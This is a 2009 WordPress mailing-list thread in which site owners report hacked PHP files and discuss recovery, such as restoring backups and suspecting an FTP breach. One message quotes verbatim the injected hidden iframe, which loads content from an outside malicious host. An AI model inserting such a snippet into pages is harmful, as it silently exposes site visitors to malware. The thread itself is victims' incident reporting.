[wp-testers] Default.widgets.php Hacked? What to do?

dinu hello at offlineblog.net
Thu Jul 23 21:18:57 UTC 2009 

I had to restore from backup. the entire blog
when I first saw Default.widgets.php hacked, I tried restoring only that
page. But then I found hidden iframe codes on all of my pages ( including
pages after login )

when I contacted Dreamhost support, they said it was an ftp hack. So, I
would think its not a wordpress issue.

On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh <navjotjsingh at gmail.com>wrote:

> 2.8.1 at the time of being hacked. Just upgraded to 2.8.2
>
> On Fri, Jul 24, 2009 at 2:31 AM, Joshua
> Dunbar<josh2007 at findingjesustoday.com> wrote:
> > What version of wordpress are you running?
> >
> > --------------------------------------------------
> > From: "Chris Carter" <carter.chris at gmail.com>
> > Sent: Thursday, July 23, 2009 3:43 PM
> > To: <wp-testers at lists.automattic.com>
> > Cc: <wp-testers at lists.automattic.com>; <wp-hackers at lists.automattic.com>
> > Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?
> >
> >> I keep getting hacked with that code inserted into admin/default-filters
> >>
> >> Chris Carter
> >> President
> >> 314media.com
> >> 314-714-5448
> >>
> >> On Jul 23, 2009, at 3:31 PM, Navjot Singh <navjotjsingh at gmail.com>
>  wrote:
> >>
> >>> I have a blog running on 2.8.2 and suddenly now I find all index.php
> >>> and wp-includes/Default.widgets.php hacked with following code
> >>> inserted randomly :
> >>>
> >>> <iframe src="http://u1j.in:8080/ts/in.cgi?pepsi109" width=125
> >>> height=125 style="visibility: hidden"></iframe>
> >>>
> >>> How to prevent further hacking? I am currently replacing all the files
> >>> affected since all of them affected at a certain date. I am on a
> >>> shared hosting and only one blog got attacked.
> >>>
> >>> Regards
> >>> Navjot Singh
> >>> _______________________________________________
> >>> wp-testers mailing list
> >>> wp-testers at lists.automattic.com
> >>> http://lists.automattic.com/mailman/listinfo/wp-testers
> >>
> >> _______________________________________________
> >> wp-testers mailing list
> >> wp-testers at lists.automattic.com
> >> http://lists.automattic.com/mailman/listinfo/wp-testers
> >
> > _______________________________________________
> > wp-testers mailing list
> > wp-testers at lists.automattic.com
> > http://lists.automattic.com/mailman/listinfo/wp-testers
> >
> _______________________________________________
> wp-testers mailing list
> wp-testers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-testers
>



-- 
With Love
Dinu

http://chromestory.com
http://offlineblog.net

More information about the wp-testers mailing list